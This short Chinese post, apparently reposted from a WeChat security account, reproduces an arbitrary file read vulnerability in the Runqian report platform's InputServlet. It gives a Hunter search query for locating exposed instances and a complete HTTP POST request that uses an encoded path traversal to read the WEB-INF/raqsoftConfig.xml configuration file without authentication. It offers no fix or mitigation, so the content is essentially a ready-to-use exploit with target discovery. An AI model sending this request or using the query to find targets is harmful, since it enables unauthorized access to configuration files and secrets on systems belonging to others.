漏洞描述
润乾报表平台InputServlet存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统内部配置文件。
资产测绘
HUNTER:app.name="润乾报表平台"
漏洞复现
POST /InputServlet?action=13 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded Connection: close file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config
原文始发于微信公众号(漏洞文库):【漏洞复现】润乾报表平台InputServlet存在任意文件读取漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论